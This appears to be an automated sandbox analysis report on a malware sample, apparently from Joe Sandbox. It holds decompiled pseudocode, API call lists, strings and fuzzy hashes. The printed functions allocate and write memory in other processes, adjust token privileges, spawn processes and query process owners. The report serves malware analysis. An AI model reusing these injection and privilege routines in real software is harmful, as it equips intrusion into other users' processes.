
APIs

Part of subcall function 006ED8B0: InitializeCriticalSectionAndSpinCount.KERNEL32(006F9B64,00000800,?,00000000,00000000,00000000,00000000), ref: 006ED916
Part of subcall function 006ED8B0: RtlEnterCriticalSection.NTDLL(006F9B64), ref: 006ED928
Part of subcall function 006ED8B0: RtlLeaveCriticalSection.NTDLL(006F9B64), ref: 006ED93C

Part of subcall function 006EC380: MultiByteToWideChar.KERNEL32(00000000,00000000,0000FDE9,00000000,00000000,00000000,00000000,00000000,?,00000010,006E8EF7,?,0000FDE9,00000010,000000FF,00000010), ref: 006EC396
Part of subcall function 006EC380: MultiByteToWideChar.KERNEL32(?,00000000,0000FDE9,?,00000000,00000000), ref: 006EC3C4

Sleep.KERNEL32(00004E20,?,000001BB), ref: 006EAC3A
Sleep.KERNEL32(00007530,?,000001BB,?,?,?,?,?,?,?,000001BB), ref: 006EAD44
Sleep.KERNEL32(00007530,?,000001BB,?,?,?,?,?,?,?,000001BB), ref: 006EAD7F
Sleep.KERNEL32(00007530,?,?,?,000001BB,?,?,?,?,?,?,?,000001BB), ref: 006EADC6
Sleep.KERNEL32(00007530,?,?,?,?,?,000001BB,?,?,?,?,?,?,?,000001BB), ref: 006EAE11

Strings

ar, xrefs: 006EABD5
/r/s, xrefs: 006EABF5
.baz, xrefs: 006EABDD
rust, xrefs: 006EABE5
afet, xrefs: 006EABED

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: Sleep$CriticalSection$ByteCharMultiWide$CountEnterInitializeLeaveSpin
String ID: .baz$/r/s$afet$ar$rust
API String ID: 2543766595-2414577613
Opcode ID: fdc481246d52ed2a1afe8cc3fdfe000b5b7d1e4bacc1fff1de8f90b09117cb2c
Instruction ID: 1e16d4bff09145ca9ca467f34ee1679bb0a3d7f4847fa490fceb4d06317a26c6
Opcode Fuzzy Hash: fdc481246d52ed2a1afe8cc3fdfe000b5b7d1e4bacc1fff1de8f90b09117cb2c
Instruction Fuzzy Hash: B071F4B16063819BD720AB67DC45BABB7EBAF80B40F24481CF48587291E730E905C757

Uniqueness

Uniqueness Score: -1.00%

Function 006E43E0, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 185
processCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E006E43E0(void* __ecx, void* __eflags) {
				void* _t49;
				void* _t50;
				int _t58;
				intOrPtr _t59;
				WCHAR* _t60;
				short* _t61;
				intOrPtr _t64;
				signed int _t73;
				void* _t77;
				WCHAR* _t78;
				signed int _t79;
				WCHAR* _t81;
				intOrPtr _t87;
				intOrPtr _t88;
				signed int _t89;
				signed int _t93;
				signed int _t94;
				WCHAR* _t98;
				void* _t99;
				struct _STARTUPINFOW* _t100;
				void* _t101;
				void* _t102;
				intOrPtr* _t103;
				void* _t104;
				void* _t105;

				_t105 = __eflags;
				_t77 = _t102;
				_t99 = __ecx;
				E006F6610(_t77, 0, 0x56c);
				_t103 = _t102 + 0xc;
				_push(0);
				_push(0);
				if(E006EFA90(_t99, _t105, 0, _t77, 0) == 0 ||  *_t103 == 0) {
					L26:
					_t49 =  *(_t103 + 0x4c);
					if(_t49 != 0) {
						CloseHandle(_t49);
					}
					_t50 =  *(_t103 + 0x50);
					if(_t50 != 0) {
						CloseHandle(_t50);
					}
					_t51 =  *_t103;
					if( *_t103 != 0) {
						E006E91E0(_t51);
						_t103 = _t103 + 4;
					}
					return  *((intOrPtr*)(_t103 + 4));
				} else {
					_t100 = _t103 + 8;
					_t100->cb = 0x44;
					GetStartupInfoW(_t100);
					if( *((intOrPtr*)(_t103 + 0x580)) == 0) {
						L23:
						_t58 = CreateProcessW( *(_t103 + 0x4c - 0x4c), 0, 0, 0, 0, 0, 0, 0, _t100, _t103 + 0x4c);
						_t59 =  *0x6f9b0c; // 0x2ef350
						if(_t58 == 0) {
							 *((intOrPtr*)(_t59 + 8)) = 7;
						} else {
							 *((intOrPtr*)(_t59 + 8)) = 1;
							 *((intOrPtr*)(_t103 + 4)) = 1;
						}
						goto L26;
					}
					_t87 =  *0x6f9ac0; // 0x2f87c8
					_t98 = _t103 + 0x6c;
					_t60 = _t98;
					 *(_t98 - 4) = _t98;
					 *((intOrPtr*)(_t98 - 8)) = _t87;
					if(_t87 == 0) {
						L9:
						_t88 =  *0x6f9bac; // 0x306478
						 *_t60 = 0x2c;
						_t61 =  &(_t60[1]);
						 *(_t103 + 0x68) = _t61;
						 *((intOrPtr*)(_t103 + 0x64)) = _t88;
						if(_t88 == 0) {
							L15:
							 *_t61 = 0x2c;
							 *(_t103 + 0x68) =  &(_t61[1]);
							E006E9D40( &(_t61[1]));
							_t64 = E006EB7A0( *0x6f9b84);
							_t104 = _t103 + 4;
							 *((intOrPtr*)(_t104 + 0x64)) = _t64;
							if(_t64 == 0) {
								L22:
								_t78 = _t104 + 0x46c;
								 *((short*)( *((intOrPtr*)(_t78 - 0x404)))) = 0;
								E006F4520(_t78, 0x59);
								_t103 = _t104 + 8;
								SetEnvironmentVariableW(_t78, _t98);
								goto L23;
							}
							_t89 = 0xfffffffe;
							_t93 = 0;
							while( *((short*)(_t64 + _t93 * 2)) != 0) {
								_t93 = _t93 + 1;
								_t89 = _t89 + 0xfffffffe;
								if(_t93 != 0x20) {
									continue;
								}
								 *(_t104 + 0x60) = 0;
								 *(_t104 + 0x5c) = 0x80070057;
								L21:
								E006E91E0(_t64);
								_t104 = _t104 + 4;
								goto L22;
							}
							 *(_t104 + 0x60) = _t93;
							 *(_t104 + 0x5c) = 0;
							E006EC400( *((intOrPtr*)(_t104 + 0x70)), _t64,  ~_t89);
							_t104 = _t104 + 0xc;
							_t64 =  *((intOrPtr*)(_t104 + 0x64));
							_t35 = _t104 + 0x68;
							 *_t35 =  *(_t104 + 0x68) +  *(_t104 + 0x60) +  *(_t104 + 0x60);
							__eflags =  *_t35;
							goto L21;
						}
						_t94 = 0xfffffffe;
						_t79 = 0;
						while( *((short*)(_t88 + _t79 * 2)) != 0) {
							_t79 = _t79 + 1;
							_t94 = _t94 + 0xfffffffe;
							if(_t79 != 0x80) {
								continue;
							}
							 *(_t103 + 0x60) = 0;
							 *(_t103 + 0x5c) = 0x80070057;
							goto L15;
						}
						 *(_t103 + 0x60) = _t79;
						 *(_t103 + 0x5c) = 0;
						E006EC400(_t61, _t88,  ~_t94);
						_t103 = _t103 + 0xc;
						_t61 =  *(_t103 + 0x60) +  *(_t103 + 0x60) +  *(_t103 + 0x68);
						__eflags = _t61;
						 *(_t103 + 0x68) = _t61;
						goto L15;
					}
					_t73 = 0;
					_t101 = 0;
					while( *((short*)(_t87 + _t73 * 2)) != 0) {
						_t73 = _t73 + 1;
						_t101 = _t101 + 0xfffffffe;
						if(_t73 != 0x80) {
							continue;
						}
						 *(_t103 + 0x60) = 0;
						 *(_t103 + 0x5c) = 0x80070057;
						_t60 = _t98;
						goto L9;
					}
					 *(_t103 + 0x60) = _t73;
					 *(_t103 + 0x5c) = 0;
					E006EC400(_t98, _t87, 2 - _t101);
					_t103 = _t103 + 0xc;
					_t81 = _t77 - _t101 + 0x6c;
					__eflags = _t81;
					_t60 = _t81;
					 *(_t103 + 0x68) = _t81;
					goto L9;
				}
			}

0x006e43e0
0x006e43ea
0x006e43ec
0x006e43f7
0x006e43fc
0x006e4401
0x006e4402
0x006e440d
0x006e45f0
0x006e45f0
0x006e45f6
0x006e45f9
0x006e45f9
0x006e45ff
0x006e4605
0x006e4608
0x006e4608
0x006e460e
0x006e4613
0x006e4616
0x006e461b
0x006e461b
0x006e462c
0x006e441e
0x006e4425
0x006e4429
0x006e4430
0x006e4438
0x006e45bc
0x006e45ce
0x006e45d6
0x006e45db
0x006e45e9
0x006e45dd
0x006e45e0
0x006e45e3
0x006e45e3
0x00000000
0x006e45db
0x006e443e
0x006e4444
0x006e4448
0x006e444a
0x006e444f
0x006e4452
0x006e44a7
0x006e44a7
0x006e44ad
0x006e44b2
0x006e44b5
0x006e44bb
0x006e44bf
0x006e4514
0x006e4514
0x006e451c
0x006e4520
0x006e452b
0x006e4530
0x006e4535
0x006e4539
0x006e4597
0x006e4597
0x006e45a4
0x006e45ac
0x006e45b1
0x006e45b6
0x00000000
0x006e45b6
0x006e453b
0x006e4540
0x006e4542
0x006e4549
0x006e454a
0x006e4550
0x00000000
0x00000000
0x006e4552
0x006e455a
0x006e458e
0x006e458f
0x006e4594
0x00000000
0x006e4594
0x006e4566
0x006e456a
0x006e4578
0x006e457d
0x006e4584
0x006e458a
0x006e458a
0x006e458a
0x00000000
0x006e458a
0x006e44c1
0x006e44c6
0x006e44c8
0x006e44cf
0x006e44d0
0x006e44d9
0x00000000
0x00000000
0x006e44db
0x006e44e3
0x00000000
0x006e44e3
0x006e44ef
0x006e44f3
0x006e44fe
0x006e4503
0x006e450c
0x006e450c
0x006e4510
0x00000000
0x006e4510
0x006e4454
0x006e4456
0x006e4458
0x006e445f
0x006e4460
0x006e4468
0x00000000
0x00000000
0x006e446a
0x006e4472
0x006e447a
0x00000000
0x006e447a
0x006e447e
0x006e4487
0x006e4494
0x006e4499
0x006e449e
0x006e449e
0x006e44a1
0x006e44a3
0x00000000
0x006e44a3

APIs

GetStartupInfoW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 006E4430
SetEnvironmentVariableW.KERNEL32(?,?,?,?,00000000), ref: 006E45B6
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 006E45CE
CloseHandle.KERNEL32(?), ref: 006E45F9
CloseHandle.KERNEL32(?), ref: 006E4608

Strings

W, xrefs: 006E455A
xd0, xrefs: 006E44A7

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: CloseHandle$CreateEnvironmentInfoProcessStartupVariable
String ID: W$xd0
API String ID: 2864332936-518749000
Opcode ID: 69a37f92cbffe887a727614f1752c02917a60831bdc5218c79d244e0cf416bea
Instruction ID: be41641659ffa96e0b856027cb6fc11877e8dedb17a68318a57dbb51f732d695
Opcode Fuzzy Hash: 69a37f92cbffe887a727614f1752c02917a60831bdc5218c79d244e0cf416bea
Instruction Fuzzy Hash: A2519AB0A093819BD7108F2ADC49B2BBBEAEF80314F14452CF495873A1EB75D805CB66

Uniqueness

Uniqueness Score: -1.00%

Function 006EC110, Relevance: 12.2, APIs: 8, Instructions: 204
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E006EC110(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, intOrPtr _a20) {
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _t47;
				void* _t50;
				void* _t51;
				void* _t52;
				void* _t66;
				signed int _t67;
				void* _t70;
				intOrPtr _t73;
				void* _t74;
				void* _t76;
				DWORD* _t77;
				DWORD* _t80;
				intOrPtr _t83;
				void* _t84;
				void* _t85;
				intOrPtr _t86;
				void* _t87;
				void* _t89;
				long* _t90;
				long* _t91;

				_t90 =  &_v24;
				 *_t90 = 0;
				if( *((intOrPtr*)(__ecx + 0x80)) == 0) {
					L44:
					return 0;
				}
				_t88 = _a8;
				_t73 = _a12;
				_t87 = __ecx;
				if(_a8 != 0 || _t73 == 0) {
					_t83 = _a4;
					_t47 = 0;
					_v36 = 0;
					if(_t83 == 0) {
						L5:
						_v28 = _t47;
						if(_t73 == 0) {
							L7:
							_t84 = _a16;
							_t76 = 0;
							_t89 = 0;
							if(_t84 == 0) {
								L9:
								_t48 = _a20;
								if(_a20 == 0) {
									L19:
									_push(0);
									_push( *((intOrPtr*)(_t87 + 0x94)));
									_push( *((intOrPtr*)(_t87 + 0x9c)));
									_v32 = _t76;
									_push(_t76);
									_push(_t89);
									_push(_t73);
									_push(_v36);
									_push(_v28);
									_push(_t90);
									_push(8);
									_push( *((intOrPtr*)(_t87 + 0xa0)));
									_push(_t87);
									_t50 = E006F3FA0();
									_t91 =  &(_t90[0xc]);
									if(_t50 == 0) {
										_t74 = _t84;
										L31:
										_t51 = _v32;
										if(_t51 != 0) {
											VirtualFreeEx( *(_t87 + 0x70), _t51, 0, 0x8000);
										}
										_t84 = _t74;
										L34:
										if(_t89 != 0) {
											_t77 =  &_v20;
											 *_t77 = 0;
											if(ReadProcessMemory( *(_t87 + 0x70), _t89, _t84, 0x400, _t77) == 0 || _v20 != 0x400) {
												 *_t91 = 0;
											}
											VirtualFreeEx( *(_t87 + 0x70), _t89, 0, 0x8000);
										}
										L39:
										if(_v36 != 0) {
											VirtualFreeEx( *(_t87 + 0x70), _v36, 0, 0x8000);
										}
										L41:
										_t52 = _v28;
										if(_t52 != 0) {
											VirtualFreeEx( *(_t87 + 0x70), _t52, 0, 0x8000);
										}
										L43:
										return  *_t91;
									}
									 *(_t87 + 0x44) =  *_t91;
									if(_t89 != 0) {
										_t80 =  &_v24;
										 *_t80 = 0;
										if(ReadProcessMemory( *(_t87 + 0x70), _t89, _t84, 0x400, _t80) == 0 || _v24 != 0x400) {
											 *_t91 = 0;
										}
										VirtualFreeEx( *(_t87 + 0x70), _t89, 0, 0x8000);
									}
									_t74 = _t84;
									_t85 = 0;
									while(1) {
										_push(1);
										if(E006F5020(_t87, 0) != 0) {
											break;
										}
										_t85 = _t85 + 1;
										if(_t85 < 2) {
											continue;
										}
										_t89 = 0;
										_t115 = _t85 - 2;
										if(_t85 == 2) {
											goto L31;
										}
										break;
									}
									E006E76A0(_t87, _t115);
									_t89 = 0;
									goto L31;
								}
								_t66 = E006E9CD0(_t48,  *(_t87 + 0x70), _t48, 0x184);
								_t91 =  &(_t90[3]);
								if(_t66 == 0) {
									goto L34;
								}
								_t76 = _t66;
								_t86 =  *((intOrPtr*)(_a20 + 0x180));
								if(_t86 == 0) {
									L18:
									_t84 = _a16;
									goto L19;
								} else {
									_t67 = 0;
									L13:
									L13:
									if( *((short*)(_t86 + _t67 * 2)) == 0) {
										__eflags = _t67;
										if(_t67 != 0) {
											_v32 = _t76;
											 *((intOrPtr*)(_a20 + 0x180)) = E006E9CD0(_t67,  *(_t87 + 0x70), _t86, _t67);
											E006E91E0(_t86);
											_t76 = _v32;
											_t90 =  &(_t91[4]);
										}
									} else {
										goto L14;
									}
									goto L18;
									L14:
									_t67 = _t67 + 1;
									if(_t67 != 0x7fffffff) {
										goto L13;
									} else {
										goto L18;
									}
								}
							}
							_t70 = E006E9CD0(_t47,  *(_t87 + 0x70), _t84, 0x400);
							_t76 = 0;
							_t91 =  &(_t90[3]);
							_t89 = _t70;
							if(_t70 == 0) {
								goto L39;
							}
							goto L9;
						}
						_t47 = E006E9CD0(_t47,  *(_t87 + 0x70), _t88, _t73);
						_t91 =  &(_t90[3]);
						_v36 = _t47;
						if(_t47 == 0) {
							goto L41;
						}
						goto L7;
					}
					_t47 = E006E9CD0( *0x6f9d28(_t83) + 1,  *(_t87 + 0x70), _t83, 0);
					_t91 =  &(_t90[3]);
					if(0 == 0) {
						goto L43;
					}
					goto L5;
				} else {
					goto L44;
				}
			}

0x006ec114
0x006ec119
0x006ec122
0x006ec37c
0x006ec37c
0x006ec37c
0x006ec128
0x006ec12c
0x006ec130
0x006ec134
0x006ec13e
0x006ec142
0x006ec147
0x006ec151
0x006ec170
0x006ec172
0x006ec176
0x006ec191
0x006ec191
0x006ec195
0x006ec197
0x006ec19e
0x006ec1bd
0x006ec1bd
0x006ec1c3
0x006ec231
0x006ec233
0x006ec235
0x006ec23b
0x006ec241
0x006ec245
0x006ec246
0x006ec247
0x006ec248
0x006ec24c
0x006ec250
0x006ec251
0x006ec253
0x006ec259
0x006ec25a
0x006ec25f
0x006ec264
0x006ec2db
0x006ec2dd
0x006ec2dd
0x006ec2e3
0x006ec2f0
0x006ec2f0
0x006ec2f6
0x006ec2f8
0x006ec2fa
0x006ec2ff
0x006ec303
0x006ec31a
0x006ec326
0x006ec326
0x006ec338
0x006ec338
0x006ec33e
0x006ec343
0x006ec353
0x006ec353
0x006ec359
0x006ec359
0x006ec35f
0x006ec36c
0x006ec36c
0x006ec372
0x00000000
0x006ec372
0x006ec26b
0x006ec26e
0x006ec273
0x006ec277
0x006ec28e
0x006ec29a
0x006ec29a
0x006ec2ac
0x006ec2ac
0x006ec2b2
0x006ec2b4
0x006ec2b6
0x006ec2b8
0x006ec2c1
0x00000000
0x00000000
0x006ec2c3
0x006ec2c7
0x00000000
0x00000000
0x006ec2c9
0x006ec2cb
0x006ec2ce
0x00000000
0x00000000
0x00000000
0x006ec2ce
0x006ec2d2
0x006ec2d7
0x00000000
0x006ec2d7
0x006ec1ce
0x006ec1d3
0x006ec1d8
0x00000000
0x00000000
0x006ec1e2
0x006ec1e4
0x006ec1ec
0x006ec22d
0x006ec22d
0x00000000
0x006ec1ee
0x006ec1ee
0x00000000
0x006ec1f0
0x006ec1f5
0x006ec201
0x006ec203
0x006ec20a
0x006ec21a
0x006ec221
0x006ec226
0x006ec22a
0x006ec22a
0x00000000
0x00000000
0x00000000
0x00000000
0x006ec1f7
0x006ec1f7
0x006ec1fd
0x00000000
0x006ec1ff
0x00000000
0x006ec1ff
0x006ec1fd
0x006ec1ec
0x006ec1a9
0x006ec1ae
0x006ec1b0
0x006ec1b3
0x006ec1b7
0x00000000
0x00000000
0x00000000
0x006ec1b7
0x006ec17d
0x006ec182
0x006ec187
0x006ec18b
0x00000000
0x00000000
0x00000000
0x006ec18b
0x006ec160
0x006ec165
0x006ec16a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000

APIs

lstrlen.KERNEL32(?), ref: 006EC154
ReadProcessMemory.KERNEL32(?,?,?,00000400,?), ref: 006EC286
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 006EC2AC
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 006EC2F0
ReadProcessMemory.KERNEL32(?,?,?,00000400,?), ref: 006EC312
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 006EC338
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 006EC353
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 006EC36C

Part of subcall function 006E9CD0: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,00000000,?,00000000,?,?,006EDA93,?,?,00000080), ref: 006E9CE8
Part of subcall function 006E9CD0: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,006EDA93,?,?,00000080), ref: 006E9D07

Part of subcall function 006E91E0: RtlFreeHeap.NTDLL(00000008,?,006E9F64), ref: 006E91F1

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: FreeVirtual$MemoryProcess$Read$AllocHeapWritelstrlen
String ID:
API String ID: 2758599655-0
Opcode ID: de2d9734ee1c0621cd4ea45cad07cda12ec54cd9ed0f6b65fd52bfda37b64764
Instruction ID: 8fd269882a125700c6bc48b54ee80bb6c8defd53caff82a925a2b98b5ed2b33e
Opcode Fuzzy Hash: de2d9734ee1c0621cd4ea45cad07cda12ec54cd9ed0f6b65fd52bfda37b64764
Instruction Fuzzy Hash: 2E61D470605741AFE7215F66CC09BABB7EAFF80714F14482CFA91963A0DB71E802DB65

Uniqueness

Uniqueness Score: -1.00%

Function 006E5150, Relevance: 12.1, APIs: 8, Instructions: 125
processCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E006E5150(void* __ecx, void* __eflags) {
				intOrPtr _t26;
				intOrPtr _t27;
				void* _t29;
				void* _t30;
				WCHAR* _t36;
				void* _t37;
				int _t38;
				intOrPtr _t39;
				WCHAR* _t44;
				struct _PROCESS_INFORMATION* _t46;
				struct _STARTUPINFOW* _t52;
				void* _t53;
				WCHAR* _t57;
				struct _STARTUPINFOW* _t58;
				LPWSTR* _t59;
				WCHAR** _t60;
				intOrPtr _t62;

				_t47 = __ecx;
				_t53 = __ecx;
				_t52 = _t58;
				E006F6610(_t52, 0, 0x530);
				_t59 =  &(_t58->lpTitle);
				_t62 =  *0x6f9ae8; // 0x1
				if(_t62 == 0) {
					return E006E43E0(_t53, __eflags, 0);
				}
				E006E8CD0(_t47);
				_t60 =  &(_t59[1]);
				_t44 =  &(_t60[0x1a]);
				 *_t44 = 0;
				 *(_t44 - 0xc) = _t44;
				_t26 =  *0x6f9de4(0, 0x1c,  *((intOrPtr*)(_t44 - 0x10)), 0, _t44,  &(_t59[0x16]));
				_t63 = _t26;
				 *((intOrPtr*)(_t44 - 8)) = _t26;
				if(_t26 < 0) {
					_t60[0x17] = 0;
					_t27 = 0;
					__eflags = 0;
				} else {
					_t57 =  &(_t60[0x11a]);
					E006F4520(_t57, 0x78);
					_t60 =  &(_t60[2]);
					GetTempFileNameW(_t44, _t57, 0, _t44);
					_t27 =  *((intOrPtr*)(_t57 - 0x40c));
				}
				_push(0);
				_push(0);
				if(E006EFA90(_t53, _t63, _t27,  &(_t60[0x15]), 0) == 0) {
					L11:
					_t29 = _t60[0x11];
					if(_t29 != 0) {
						CloseHandle(_t29);
					}
					_t30 = _t60[0x12];
					if(_t30 != 0) {
						CloseHandle(_t30);
					}
					_t31 = _t60[0x15];
					if(_t60[0x15] != 0) {
						E006E91E0(_t31);
						_t60 =  &(_t60[1]);
					}
					return _t60[0x19];
				} else {
					_t36 = _t60[0x15];
					if(_t36 == 0) {
						goto L11;
					}
					_t46 =  &(_t60[0x11]);
					_push(0);
					_push(0);
					_push(0x420);
					_push(_t36);
					_push( &(_t60[0x12]));
					_t37 = E006E5470(_t46);
					_t60 =  &(_t60[6]);
					if(_t37 == 0) {
						 *_t60 = 0x44;
						GetStartupInfoW(_t52);
						_t38 = CreateProcessW(_t60[0x1e], 0, 0, 0, 0, 0, 0, 0, _t52, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							_t39 =  *0x6f9b0c; // 0x2ef350
							 *((intOrPtr*)(_t39 + 8)) = 7;
							goto L11;
						}
						L10:
						_t60[0x19] = 1;
						goto L11;
					}
					CloseHandle(_t60[0x11]);
					CloseHandle(_t60[0x12]);
					goto L10;
				}
			}

0x006e5150
0x006e515a
0x006e515e
0x006e5167
0x006e516c
0x006e516f
0x006e5175
0x00000000
0x006e51ce
0x006e517c
0x006e5181
0x006e5184
0x006e5188
0x006e518d
0x006e5198
0x006e519e
0x006e51a0
0x006e51a3
0x006e51d8
0x006e51e0
0x006e51e0
0x006e51a5
0x006e51a5
0x006e51af
0x006e51b4
0x006e51bc
0x006e51c2
0x006e51c2
0x006e51ea
0x006e51eb
0x006e51f6
0x006e5261
0x006e5261
0x006e5267
0x006e526a
0x006e526a
0x006e5270
0x006e5276
0x006e5279
0x006e5279
0x006e527f
0x006e5285
0x006e5288
0x006e528d
0x006e528d
0x00000000
0x006e51f8
0x006e51f8
0x006e51fe
0x00000000
0x00000000
0x006e5200
0x006e520a
0x006e520b
0x006e520c
0x006e5211
0x006e5212
0x006e5214
0x006e5219
0x006e521e
0x006e5234
0x006e523c
0x006e524f
0x006e5255
0x006e5257
0x006e529f
0x006e52a4
0x00000000
0x006e52a4
0x006e5259
0x006e5259
0x00000000
0x006e5259
0x006e522a
0x006e5230
0x00000000
0x006e5230

APIs

Part of subcall function 006E8CD0: GetCurrentProcess.KERNEL32 ref: 006E8D0D
Part of subcall function 006E8CD0: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 006E8D19
Part of subcall function 006E8CD0: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006E8D3A
Part of subcall function 006E8CD0: AdjustTokenPrivileges.ADVAPI32(00000000,00000000,?,00000010,?,?), ref: 006E8D68
Part of subcall function 006E8CD0: RevertToSelf.ADVAPI32 ref: 006E8DD9

SHGetFolderPathW.SHELL32(00000000,0000001C,?,00000000,?), ref: 006E5198
GetTempFileNameW.KERNEL32(?,?,00000000,?), ref: 006E51BC
CloseHandle.KERNEL32(?), ref: 006E522A
CloseHandle.KERNEL32(?), ref: 006E5230
GetStartupInfoW.KERNEL32 ref: 006E523C
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 006E524F
CloseHandle.KERNEL32(?), ref: 006E526A
CloseHandle.KERNEL32(?), ref: 006E5279

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: CloseHandle$Process$Token$AdjustCreateCurrentFileFolderInfoLookupNameOpenPathPrivilegePrivilegesRevertSelfStartupTempValue
String ID:
API String ID: 2859521768-0
Opcode ID: f93b5c1f5aee8d95867b3b6021072cb84f55600d0fd4c33a38b502a2ddee4c00
Instruction ID: e0a52c434b9bfd6823706ca66b59071ebd28b66c4fdcef8bb3b55fba3d447b91
Opcode Fuzzy Hash: f93b5c1f5aee8d95867b3b6021072cb84f55600d0fd4c33a38b502a2ddee4c00
Instruction Fuzzy Hash: 73319271605344AFE7109B62DC89F6B7BEEEF81788F044419FA0686291EB75ED04CB72

Uniqueness

Uniqueness Score: -1.00%

Function 006ECE40, Relevance: 12.1, APIs: 8, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E006ECE40(long _a4) {
				WCHAR* _v0;
				short _v536;
				union _SID_NAME_USE _v540;
				char _v544;
				WCHAR* _v548;
				void* _v552;
				void* _t16;
				void* _t20;
				void* _t25;
				DWORD* _t28;
				long _t29;
				DWORD* _t30;
				DWORD* _t34;
				long _t35;
				void* _t36;
				void* _t37;
				HANDLE* _t39;

				_t35 = 0;
				_v548 = 0;
				_t16 = OpenProcess(0x400, 0, _a4);
				if(_t16 == 0) {
					L13:
					return _t35;
				}
				_t37 = _t16;
				if(OpenProcessToken(_t37, 8, _t39) == 0) {
					L9:
					_t35 = 0;
					L10:
					_t20 = _v548;
					if(_t20 != 0) {
						CloseHandle(_t20);
					}
					CloseHandle(_t37);
					goto L13;
				}
				_t36 = 0;
				_t30 =  &_v544;
				 *_t30 = 0;
				if(GetTokenInformation(_v548, 1, 0, 0, _t30) == 0) {
					if(GetLastError() != 0x7a) {
						goto L9;
					}
					_t25 = E006E3180(_v548, 0);
					if(_t25 == 0) {
						goto L9;
					}
					_t36 = _t25;
				}
				if(GetTokenInformation(_v552, 1, _t36, _v548, _t30) == 0) {
					goto L9;
				}
				_t34 =  &_v548;
				_v0 = 0;
				 *_t34 = _a4;
				_t28 =  &_v544;
				 *_t28 = 0x100;
				 *_v0 = 0;
				_t29 = LookupAccountSidW(0,  *_t36, _v0, _t34,  &_v536, _t28,  &_v540);
				_t35 = _t29;
				if(_t29 != 0) {
					_t35 = _v548;
				}
				goto L10;
			}

0x006ece51
0x006ece53
0x006ece5d
0x006ece65
0x006ecf3a
0x006ecf46
0x006ecf46
0x006ece6b
0x006ece7b
0x006ecf23
0x006ecf23
0x006ecf25
0x006ecf25
0x006ecf2a
0x006ecf2d
0x006ecf2d
0x006ecf34
0x00000000
0x006ecf34
0x006ece81
0x006ece83
0x006ece87
0x006ece9a
0x006ecf08
0x00000000
0x00000000
0x006ecf10
0x006ecf1a
0x00000000
0x00000000
0x006ecf1c
0x006ecf1c
0x006eceb0
0x00000000
0x00000000
0x006ecec0
0x006ececa
0x006ececd
0x006ececf
0x006eced3
0x006eced9
0x006eceed
0x006ecef3
0x006ecef7
0x006ecef9
0x006ecef9
0x00000000

APIs

OpenProcess.KERNEL32(00000400,00000000,?), ref: 006ECE5D
OpenProcessToken.ADVAPI32(00000000,00000008), ref: 006ECE73
GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 006ECE92
GetTokenInformation.ADVAPI32(00000001,00000001(TokenIntegrityLevel),00000000,?,?), ref: 006ECEA8
LookupAccountSidW.ADVAPI32(00000000,00000000,?,?,?,?,?), ref: 006ECEED
GetLastError.KERNEL32 ref: 006ECEFF
CloseHandle.KERNEL32(00000000), ref: 006ECF2D
CloseHandle.KERNEL32(00000000), ref: 006ECF34

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: Token$CloseHandleInformationOpenProcess$AccountErrorLastLookup
